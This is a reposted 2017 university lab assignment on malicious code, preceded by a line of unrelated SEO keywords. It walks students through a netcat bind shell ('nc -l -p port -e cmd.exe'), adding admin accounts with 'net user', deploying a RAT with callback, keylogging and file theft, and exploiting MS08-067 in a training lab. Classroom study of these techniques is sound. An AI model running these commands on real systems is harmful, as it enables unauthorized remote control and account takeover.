网站seo优化方法,湛江网站推广优化,免费网站设计模板,wordpress monster中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 冷其航 年级 14级 区队 二区队 指导教师 高见老师 信息技术与网络安全学院 2017年10月24日 实验任务总纲 2017—2018 学年 第 一 学期 一、实验…中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 冷其航 年级 14级 区队 二区队 指导教师 高见老师 信息技术与网络安全学院 2017年10月24日 实验任务总纲 2017—2018 学年 第 一 学期 一、实验目的 1通过对木马的练习使读者理解和掌握木马传播和运行的机制通过手动删除木马掌握检查木马和删除木马的技巧学会防御木马的相关知识加深对木马的安全防范意识。 2了解并熟悉常用的网络攻击工具木马的基本功能 3达到巩固课程知识和实际应用的目的。 二、实验要求 1认真阅读每个实验内容需要截图的题目需清晰截图并对截图进行标注和说明。 2文档要求结构清晰图文表达准确标注规范。推理内容客观、合理、逻辑性强。 3软件工具可使用NC、MSF等。 4实验结束后保留电子文档。 三、实验步骤 1准备 提前做好实验准备实验前应把详细了解实验目的、实验要求和实验内容熟悉并准备好实验用的软件工具按照实验内容和要求提前做好实验内容的准备。 2实验环境 描述实验所使用的硬件和软件环境包括各种软件工具 开机并启动软件office2003或2007、浏览器、加解密软件。 3实验过程 1启动系统和启动工具软件环境。 2用软件工具实现实验内容。 4实验报告 按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中文档按照规定的书写格式书写表格要有表说图形要有图说。 任务一 利用NC控制电脑 NetCat具有网络军刀之称它小巧精悍且功能强大说它小巧精悍是因为他的软件大小现在已经压缩到只有十几KB而且在功能上丝毫不减。 实验过程需要两个同学相互配合完成 步骤一 在受害者的机器 同学A输入下面的命令 nc.exe -l -p port -e cmd.exe 进入监听模式 步骤二 在攻击者的机器.同学B输入下面的命令 nc ip port //连接victim_IP,然后得到一个shell。 需要截图 步骤三 在shell中利用net user 用户名 密码 /add 添加一个用户并在受害者的机器中使用 net user 命令进行验证。需要截图 可以继续通过命令行做一些事情。 任务二 利用木马控制电脑 实验过程需要两个同学配合 步骤一 攻击者的机器. 同学A打开V2014.exe程序或则star RAT这两个木马功能类似。 步骤二 点击菜单栏中的“服务生成”在弹出的配置服务端中配置回连IP地址攻击者IP和端口号并点击“生成”按钮生成木马服务端。 步骤三 将生成的木马可执行程序拷贝到受害者的机器并双击运行。 双击运行不占用cpu。 步骤四 在控制端中查看木马上线情况并对以下功能每个进行测试和截图。 文件管理尝试拷贝文件 屏幕控制尝试获取桌面 键盘记录尝试获取对方击键记录会话管理重启对方机器查看是否能自启动上线 会话管理卸载对方的木马。 任务三 通过漏洞获取shell合天平台中做 所有过程截图写博客 windows ms08067 漏洞利用 在平台中获取shell之后继续利用攻击机器使用 net user user pass /add net localgroup administrators /add 命令向被攻击的机器中添加账户并提升为管理员 然后用rdesktop 10.1.1.130 登陆对方的远程桌面 转载于:https://www.cnblogs.com/P201421420042/p/7751605.html
